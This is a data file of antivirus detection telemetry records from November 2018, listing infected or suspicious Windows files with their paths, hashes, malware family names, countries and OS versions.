  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='3f9b769c3eb222b0fd5c794b17acd464baf795424535f5c71374bbf36ce928fb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:34:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='3f9b769c3eb222b0fd5c794b17acd464baf795424535f5c71374bbf36ce928fb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:34:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1_15_7_0.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_15_7_0.html', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='3fc8f55a0284c834653c6a71369a0fd1cd2aec5c87316d83c1530357d01b6cb0', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:16:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='l760g.html', filepath='C:\\Program Files\\Z3X\\Samsung\\SamsungToolPRO\\Data\\manuals\\l760g.html', filesize=384000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='401227ac485ec78160bb412aed64bf4bd44b68e7d5c49a629760b544609be15a', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Browser\\Application\\AvastBrowser.exe', parentsize=1883096, timestamp='2018-11-01T13:52:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ppttimer1.2.exe', filepath='C:\\Users\\X\\Desktop\\PPTTimer1.2.exe', filesize=512000, name='TR/Rogue.512000.37.#M1.#R1'), hash='403b2f438e3d90db363f4381a9a0494d177e12f62554d24240507d83429139e8', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4675784, timestamp='2018-11-01T01:55:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095732-43335b8d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0993e29c\\AVSCAN-20181101-095559-362A6D63\\AVSCAN-20181101-095732-43335B8D', filesize=512000, name='TR/Rogue.512000.37.#M1.#R1'), hash='403b2f438e3d90db363f4381a9a0494d177e12f62554d24240507d83429139e8', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T01:57:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195628-0d51f1bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_058d263d\\AVSCAN-20181101-194346-9A701436\\AVSCAN-20181101-195628-0D51F1BC', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='404502f49899c86d1e8a37e9e74a14402c05702ac445e862e408d52cb3428efb', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:56:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184221-a5492c84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-184120-9C2ABE8B\\AVSCAN-20181101-184221-A5492C84', filesize=64000, name='VBA/Dldr.Agent.pazys.#M1.#R1'), hash='406187f465c797b693447ac8993fc4b5c786ecd1d1057f9b5f53bd82b3224ef3', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:42:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rpo3jur', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RPO3JUR', filesize=64000, name='VBA/Dldr.Agent.pazys.#M1.#R1'), hash='406187f465c797b693447ac8993fc4b5c786ecd1d1057f9b5f53bd82b3224ef3', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wspsetup.exe', filepath='C:\\Users\\X\\Downloads\\wspsetup.exe', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-01T14:36:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wspsetup.exe', filepath='C:\\Users\\X\\Downloads\\wspsetup.exe', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3231232, timestamp='2018-11-01T13:20:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093624-a70e991b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a23c63b\\AVSCAN-20181101-093252-8C572553\\AVSCAN-20181101-093624-A70E991B', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:36:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wspsetup (1).exe', filepath='C:\\Users\\X\\Downloads\\wspsetup (1).exe', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-01T14:36:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-153649-006346b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_82c9c397\\AVSCAN-20181101-153555-F8D24E48\\AVSCAN-20181101-153649-006346B2', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:37:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-153703-02373d07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_82c9c397\\AVSCAN-20181101-153555-F8D24E48\\AVSCAN-20181101-153703-02373D07', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:37:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142122-a3f8e6a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2be40c18\\AVSCAN-20181101-142053-A0603B4D\\AVSCAN-20181101-142122-A3F8E6A5', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:21:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='40cc00ed57e2abd3c14c47ef8c789e04c15048b53f2b179ab734bc63277c0904', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\40CC00ED57E2ABD3C14C47EF8C789E04C15048B53F2B179AB734BC63277C0904', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='40cc00ed57e2abd3c14c47ef8c789e04c15048b53f2b179ab734bc63277c0904', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:04:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='4125af41e9dc7a34b1f9cc0ff234b62e1e3c649c8d65eb4fc2427efd1e9a1152', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transfer_wireless_settings.htm', filepath='F:\\1005\\NtwkPortMon\\help\\generic\\nl\\transfer_wireless_settings.htm', filesize=376000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='4156f4d4c6dcd10fd89dad7ea0e2a96cd76855c4eb7a0c64ddee7a96272cb2c4', metadata=Row(cmdline='\\\\\\"F:\\\\\\\\\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-01T03:35:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111836-73f4e71f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_29d3b47a\\AVSCAN-20181101-111019-17917D8C\\AVSCAN-20181101-111836-73F4E71F', filesize=376000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='4156f4d4c6dcd10fd89dad7ea0e2a96cd76855c4eb7a0c64ddee7a96272cb2c4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:18:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='play.exe', filepath='i:\\العاب\\فورملا وان\\Play.exe', filesize=832000, name='HEUR/AGEN.1015942.#M1.#R1'), hash='417b87e141c6487ea2e542ad73502badb00ecc6669baafb43db69560a3436524', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:48:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1_nfe.exe', filepath='C:\\Restaurador PDV\\install nfe\\1_NFe.exe', filesize=128000, name='W32/Sality.AG.#M1.#R1'), hash='41922bf2500a97b2e4d136672b2ce61ab5a6193552e93b550f5805564af5ec61', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\jusched.exe', parentsize=224128, timestamp='2018-11-01T19:57:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='422017c0fdb0430ba03351d989984745b7f66a3097ef0a59ca28191ec5375b51', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\422017C0FDB0430BA03351D989984745B7F66A3097EF0A59CA28191EC5375B51', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='422017c0fdb0430ba03351d989984745b7f66a3097ef0a59ca28191ec5375b51', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:51:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crashsender1403.exe', filepath='\\?\\J:\\BlackShot\\System\\CrashRpt\\CrashSender1403.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='42209c7554671680a450518e743a56f44cc4bc5062dd52ad85662afb715f3dea', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='start.exe', filepath='\\\\192.168.0.100\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\生產管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='425632d45efdb7dd22ce3554f0d2cb222a02b0875f26746bcd5550470e73a9da', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:dZLJlmOScUes48KI.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:57:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-193018-5f28a8cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ab16be44\\AVSCAN-20181101-184303-2E317741\\AVSCAN-20181101-193018-5F28A8CC', filesize=428000, name='ADWARE/CrossRider.Gen7.#M1.#R1'), hash='42c1964b6c6193cb91a3c72614b2a3f641ed5d8d44919bc19e3138c57f83540e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:30:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dayd.exe', filepath='\\?\\J:\\العاب2\\Day D Time Mayhem\\DayD.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='42cc55055db8ffa24affda4f4ef6c0741024dae38e34a3077f326ab48bfe25f4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:06:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='4344a01d1f8bbf144ed969434fa83349d9e50e2c14ea2c6411af6b31b57b7462', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crystl32.exe', filepath='J:\\Desktop\\Desktop July 2016\\M Sihag\\m sihag\\PAYBILL\\CRYSREPT\\CRYSTL32.EXE', filesize=3200000, name='TR/Patched.Ren.Gen.#M2.#R3367'), hash='434eb845b05c89395214d92ccfc541cd81aa67b9d14781d11e86121502b974d3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:47:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aidl.exe', filepath='D:\\china\\tecno\\L\\5\\Tecno_L5_MT6580_20151007\\MTK\\SN Write Tool v2.1504.00\\Android\\aidl.exe', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='43730ac7c922e8e5188c0f5b7a6619900beb206abaeb41614561e3cd63b1194d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\china\\HUAWEI_Y336-U02_Firmware_V100R001C328B109_05021UAY_Sri Lanka\\Software\\Y336-U02V100R001C328B109\\Software\\Upgtade tools&drivers\\ResearchDownload_2.9.9016\\Bin\\ResearchDownload.exe', parentsize=1687552, timestamp='2018-11-01T14:48:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122939-a3e18b4e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5bb8b3e\\AVSCAN-20181101-122831-9B26EEA7\\AVSCAN-20181101-122939-A3E18B4E', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T01:29:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212646-5997b812', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ac0b4351\\AVSCAN-20181101-212454-4C8F8235\\AVSCAN-20181101-212646-5997B812', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:26:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:15:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:32:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='frxclient.exe', filepath='D:\\FRx 6.7\\Bin\\FRxReporter\\MS\\frxclient\\FRxClient.exe', filesize=128000, name='W32/Infector.Gen.#M300.#R7863'), hash='43b7394e9055872e5c011e629031f193e1a991f7dfea92d23dfb746debb44fd6', metadata=Row(cmdline=None, country='SG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\TeamViewer\\TeamViewer.exe', parentsize=19495152, timestamp='2018-11-01T04:05:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=1744000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43c5eeb2b7e21131937b9ea0ed12cf81e15a9d31d5c0a03baba07fe0b4397a86', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T18:38:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloader-fuer-nokiasoftwareupdatersetup_de.exe', filepath='F:\\Downloads\\blaah#\\Downloader-fuer-NokiaSoftwareUpdaterSetup_de.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='445f7a3bd3b5611edb93888be49641fd4c6c02d9f9e2b90bb6c761f773ab4a3a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\BullGuard Ltd\\BullGuard\\BullGuardScanner.exe', parentsize=324376, timestamp='2018-11-01T19:14:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201712-906d5c45', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_375ce914\\AVSCAN-20181101-201653-8D5AF74D\\AVSCAN-20181101-201712-906D5C45', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='445f7a3bd3b5611edb93888be49641fd4c6c02d9f9e2b90bb6c761f773ab4a3a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:17:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='netdde.exe', filepath='D:\\Backup\\Windows\\system32\\dllcache\\netdde.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='44714fce924026199d2ada331195521ba40007b6c652d7c92d88742d5966db6b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:09:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='song-เพลงฝรั่ง.exe', filepath='E:\\music\\song-เพลงฝรั่ง\\song-เพลงฝรั่ง.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='44c9767aecd78f23bc19bd584861d8f7171e48da92c57a6b9cb355b993a2ea11', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='44da06b791d061704cdc78c02eacba35e5c3385ba3b72dce439bfa2c0838ecd2', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='5a90ad557e52ab4d42cf60d0772ae2154485f72f', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\5a90ad557e52ab4d42cf60d0772ae2154485f72f', filesize=1408000, name='W32/Infector.Gen8.#M300.#R700734'), hash='44f7b32922c9d6906fc4a5ad585c8387947403e9c01e3e0f886f811aa06fe6ae', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:17:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='44f95b3635ef0851d461df529ae63747e7b923c9cf8d640198a3e85c4dc8e110', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T19:16:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='44f95b3635ef0851d461df529ae63747e7b923c9cf8d640198a3e85c4dc8e110', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T19:16:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4505995d1d23a2452f64f4c157f1da024a685c6ef9a587d6b2cfe612a6303f9b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-7\\4505995D1D23A2452F64F4C157F1DA024A685C6EF9A587D6B2CFE612A6303F9B', filesize=320000, name='HEUR/Macro.Downloader.AMAK.Gen.#M1.#R1'), hash='4505995d1d23a2452f64f4c157f1da024a685c6ef9a587d6b2cfe612a6303f9b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:58:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wncserve.exe', filepath='\\\\?\\C:\\WorkNC-LicenseServer\\exe\\msw\\wncserve.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='45b04542f0eade0ffd244589510db60267f875f7e1f4b675591d7a124d4b7be9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:01:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wncserve.exe', filepath='\\\\?\\C:\\WorkNC-LicenseServer\\exe\\msw\\wncserve.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='45b04542f0eade0ffd244589510db60267f875f7e1f4b675591d7a124d4b7be9', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:35:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wncserve.exe', filepath='\\\\?\\C:\\WorkNC-LicenseServer\\exe\\msw\\wncserve.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='45b04542f0eade0ffd244589510db60267f875f7e1f4b675591d7a124d4b7be9', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:12:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='45be2bb7883b7e635f1fcb40fb787f9371fd06d1ef5be60c485f05591cbe178d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T11:26:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122754-11e51a30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d280ee4\\AVSCAN-20181101-122741-0F721C34\\AVSCAN-20181101-122754-11E51A30', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='45be2bb7883b7e635f1fcb40fb787f9371fd06d1ef5be60c485f05591cbe178d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:27:54Z'), dt=datetime.date(2018, 11, 1)),
